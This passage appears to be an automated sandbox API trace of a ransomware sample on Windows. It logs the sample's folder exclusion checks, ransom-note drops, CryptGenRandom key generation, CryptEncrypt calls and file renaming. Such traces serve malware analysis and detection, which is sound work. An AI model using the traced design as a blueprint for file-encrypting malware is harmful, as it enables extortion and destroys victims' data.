lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.650] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.650] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.651] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.651] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.651] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.651] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.651] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.651] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.651] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.651] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.651] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.651] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.651] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.651] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.651] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.651] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.651] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.651] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.651] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.651] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.652] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.652] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf") returned 54 [0082.652] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf.Rfjfpy") returned 61 [0082.652] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zrdg.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf.Rfjfpy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zrdg.rtf.rfjfpy"), dwFlags=0x0) returned 1 [0082.653] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.653] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.653] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.653] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97d69c00, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0x937c7550, ftLastAccessTime.dwHighDateTime=0x1d4d362, ftLastWriteTime.dwLowDateTime=0x937c7550, ftLastWriteTime.dwHighDateTime=0x1d4d362, nFileSizeHigh=0x0, nFileSizeLow=0x17547, dwReserved0=0x0, dwReserved1=0x0, cFileName="zrDg.rtf", cAlternateFileName="")) returned 0 [0082.654] FindClose (in: hFindFile=0x5f8c58 | out: hFindFile=0x5f8c58) returned 1 [0082.654] CloseHandle (hObject=0x438) returned 1 [0082.654] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x88019650, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88019650, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming\\", cAlternateFileName="")) returned 0 [0082.654] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0082.654] CloseHandle (hObject=0x430) returned 1 [0082.654] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0082.654] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0082.654] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0082.654] lstrcatW (in: lpString1="Application Data", lpString2="\\" | out: lpString1="Application Data\\") returned="Application Data\\" [0082.654] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Application Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0082.654] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Program Files") returned 0x0 [0082.654] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch=":\\Windows") returned 0x0 [0082.654] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Games\\") returned 0x0 [0082.654] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Tor Browser\\") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\ProgramData\\") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\All Users") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\IETldCache\\") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Local Settings\\") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\AppData\\Local") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="AhnLab") returned 0x0 [0082.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0082.655] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned 47 [0082.655] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.655] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\\\jkbimi8.tmp") returned 59 [0082.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0082.656] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned 47 [0082.656] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0082.656] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\\\DECRYPT-FILES.txt") returned 65 [0082.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.656] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned 47 [0082.656] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*" [0082.656] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x88019650, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88019650, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming\\", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0082.656] CloseHandle (hObject=0x430) returned 1 [0082.656] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0082.656] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0082.656] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0082.656] lstrcatW (in: lpString1="Contacts", lpString2="\\" | out: lpString1="Contacts\\") returned="Contacts\\" [0082.656] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0082.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Program Files") returned 0x0 [0082.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch=":\\Windows") returned 0x0 [0082.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Games\\") returned 0x0 [0082.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\ProgramData\\") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\All Users") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\IETldCache\\") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Local Settings\\") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\AppData\\Local") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="AhnLab") returned 0x0 [0082.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0082.657] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.657] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.657] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\\\jkbimi8.tmp") returned 51 [0082.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0082.657] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.657] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0082.657] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\\\DECRYPT-FILES.txt") returned 57 [0082.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0082.666] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0082.666] CloseHandle (hObject=0x434) returned 1 [0082.667] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.667] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*" [0082.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad75ff20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0082.667] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.667] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad75ff20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.667] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.667] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.667] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="DECRYPT-FILES.txt") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="autorun.inf") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="boot.ini") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="desktop.ini") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntuser.dat") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="iconcache.db") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="bootsect.bak") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntuser.dat.log") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="thumbs.db") returned -1 [0082.667] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Bootfont.bin") returned -1 [0082.667] lstrlenW (lpString="Aclviho ASldjfl.contact") returned 23 [0082.667] lstrcmpiW (lpString1="contact", lpString2="lnk") returned -1 [0082.667] lstrcmpiW (lpString1="contact", lpString2="exe") returned -1 [0082.667] lstrcmpiW (lpString1="contact", lpString2="sys") returned -1 [0082.667] lstrcmpiW (lpString1="contact", lpString2="dll") returned -1 [0082.667] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.667] lstrlenW (lpString="Aclviho ASldjfl.contact") returned 23 [0082.667] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0082.667] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Aclviho ASldjfl.contact" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0082.667] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.669] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=1178) returned 1 [0082.669] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.669] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.671] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.671] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.671] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.672] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.672] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.672] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.672] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.673] CloseHandle (hObject=0x43c) returned 1 [0082.673] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.673] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.674] CloseHandle (hObject=0x0) returned 0 [0082.674] CloseHandle (hObject=0x438) returned 1 [0082.674] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.674] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.674] GetTickCount () returned 0x114d23e [0082.675] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.675] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.675] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.675] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.675] lstrlenA (lpString="kernel32.dll") returned 12 [0082.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.675] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.676] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.676] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.676] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.676] lstrlenA (lpString="ADDATOMA") returned 8 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.676] lstrlenA (lpString="ADDATOMW") returned 8 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.676] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.676] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: 